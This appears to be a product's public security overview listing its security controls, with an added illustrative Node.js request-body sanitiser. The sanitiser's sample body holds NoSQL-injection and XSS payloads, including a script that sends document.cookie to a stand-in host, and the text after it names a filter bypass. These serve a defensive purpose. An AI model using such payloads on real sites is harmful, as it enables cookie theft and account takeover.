
Security Overview

Version 1.0 — Last updated: 13 May 2026

This page summarises the security controls we operate. It is intended as a transparent reference for customers, auditors, and prospective partners.

Authentication

  • bcrypt password hashing (cost factor 10) — passwords are never stored in plaintext.
  • 24-hour session cookies with httpOnly, Secure, and SameSite=Lax flags.
  • CSRF protection — per-session token, validated on every state-changing request.
  • Rate limiting — 5 login attempts per 15 minutes per IP; tiered rate limits on all other endpoints.
  • Email verification required for new self-service signups.
  • Optional GitHub OAuth — alternative sign-in path with the same domain restrictions.
  • Superadmin impersonation — an admin can sign in as a user to debug; the impersonated session shows a persistent banner and the action is written to the audit log.

Data at rest

  • AES-256-GCM encryption of stored third-party API keys (Hunter, OpenRouter, etc.), enabled when API_KEY_ENCRYPTION_SECRET is configured.
  • MongoDB primary store, deployed on Hetzner Cloud VPS (Germany).
  • Daily encrypted backups, 14-day rolling retention.

Data in transit

  • TLS 1.2+ for all customer-facing traffic.
  • HSTS headers via Helmet middleware.
  • AI provider calls use OpenRouter zero-data-retention (ZDR) mode by default.

Application security

  • Helmet — sets Content-Security-Policy, X-Frame-Options, Referrer-Policy, etc.
  • express-mongo-sanitize — strips MongoDB operators from request bodies (NoSQL injection prevention).
  • hpp — prevents HTTP parameter pollution.
  • Recursive XSS sanitizer — strips <script> elements, on*= event-handler attributes, and javascript: URIs from request bodies, as a defence-in-depth layer alongside the Content-Security-Policy.
  • Zod input validation on signup, login, ICP, and lead-mutation endpoints.
  • Tiered rate limiting — general API (100/15min), sensitive ops (3/hr), admin (30/min), exports (5/hr).
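The two body-sanitising controls above (MongoDB operator stripping and the recursive XSS sanitiser), shown together as one added example in Node.js. This is illustrative code written for this page, not the product's code and not the source of express-mongo-sanitize: the function names, the regular expressions and the sample request body are all this example's own constructions. The rule for which keys to drop (keys starting with $ or containing a dot) matches what express-mongo-sanitize does by default; dropping __proto__ as well is an addition so the sanitiser cannot be used to set the prototype of the object it builds.

```javascript
// Added example (not the project's code): a recursive request-body sanitizer that
// combines two of the controls in the Security Overview in a single pass:
//   1. drop keys starting with '$' or containing '.', so an operator such as
//      {"password": {"$gt": ""}} can never reach a MongoDB query (NoSQL injection);
//   2. strip <script> elements, on*= handler attributes and javascript: URIs
//      from every string value.
// Regexes, names and the sample body are this example's assumptions.

const SCRIPT_RE = /<script\b[^>]*>[\s\S]*?<\/script\s*>/gi;
const ON_HANDLER_RE = /\son[a-z]+\s*=\s*(?:"[^"]*"|'[^']*'|[^\s>]+)/gi;
const JS_URI_RE = /javascript\s*:/gi;

// Strip until the string stops changing. A single pass is not enough: removing the
// inner "<script></script>" from "<scr<script></script>ipt>" leaves "<script>".
function sanitizeString(s) {
  let prev;
  let cur = s;
  do {
    prev = cur;
    cur = cur.replace(SCRIPT_RE, '').replace(ON_HANDLER_RE, '').replace(JS_URI_RE, '');
  } while (cur !== prev);
  return cur;
}

// Keys that could act as query operators or field-path traversal, plus __proto__
// so that building the cleaned object cannot change its prototype.
function isDangerousKey(key) {
  return key.startsWith('$') || key.includes('.') || key === '__proto__';
}

// Walk a parsed JSON body and return a cleaned copy; the input is not mutated.
// Dropped keys are collected so the caller can log an attempted injection.
function sanitizeBody(value, dropped = []) {
  if (typeof value === 'string') return sanitizeString(value);
  if (Array.isArray(value)) return value.map((v) => sanitizeBody(v, dropped));
  if (value !== null && typeof value === 'object') {
    const out = {};
    for (const [k, v] of Object.entries(value)) {
      if (isDangerousKey(k)) {
        dropped.push(k);
        continue;
      }
      out[k] = sanitizeBody(v, dropped);
    }
    return out;
  }
  return value; // numbers, booleans and null pass through unchanged
}

// Constructed login body as an attacker might send it: an operator in place of the
// password, a dotted key aimed at a nested field, and script payloads in text.
const SAMPLE_BODY = {
  email: 'victim@example.com',
  password: { $gt: '' },
  'profile.role': 'admin',
  notes: 'hi <script>fetch("//evil.example/" + document.cookie)</script>',
  website: 'JavaScript:alert(1)',
  tags: ['<img src=x onerror=alert(1)>', 'safe'],
};

function demo() {
  const dropped = [];
  const clean = sanitizeBody(SAMPLE_BODY, dropped);
  console.log(JSON.stringify(clean, null, 2));
  console.log('dropped keys:', dropped);
  return { clean, dropped };
}

demo();
```

The operator-stripping half is a sound control: a query built from the cleaned body can no longer contain $gt, $ne or a dotted path. The string-stripping half is a blacklist and should be read as the page presents it, a second layer: a payload written as java&#9;script: or inside an attribute the regex does not cover gets through, so the Content-Security-Policy set by Helmet and context-aware output encoding remain the primary XSS defences.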

AI provider data handling

  • Default routing through OpenRouter with x-openrouter-zdr: true header — providers contractually agree not to log or train on prompts/completions.
  • Non-ZDR providers (Anthropic direct, OpenAI direct, etc.) are flagged with a warning in the admin UI when selected.
  • Monthly LLM budget cap, with an email alert to admins when 80% and 100% of the cap are reached.

Monitoring & incident response

  • Sentry — captures uncaught exceptions. User context, authorization headers, and cookies are scrubbed from events before transmission.
  • Audit log — 20+ event types (login, lead approve, settings change, GDPR delete, refunds, impersonation) retained for 2 years.
  • Pipeline job tracking — every sourcing/qualification run is recorded with status, PID, and duration.
  • Health check endpoint (/health) — pings the database, Stripe, SMTP, and the active LLM provider every 30 seconds via the Docker healthcheck.

Operational

  • Closed-beta sign-ups restricted to invited users (@totalinfo.net domain) until policies are reviewed.
  • Engine + dashboard run as separate Docker containers with non-root users.
  • No customer data is sent to client-side analytics or marketing tools.
  • DSAR (Data Subject Access Request) queue with 14-day cooling-off period for account deletion.

Open security tickets

We maintain a public log of known issues and timelines for resolution. To raise a vulnerability privately, please email richard@ipr.guru with subject "Security Disclosure".

Sub-processors

See Sub-processors for the full list of vendors that process personal data on our behalf.

Contact

richard@ipr.guru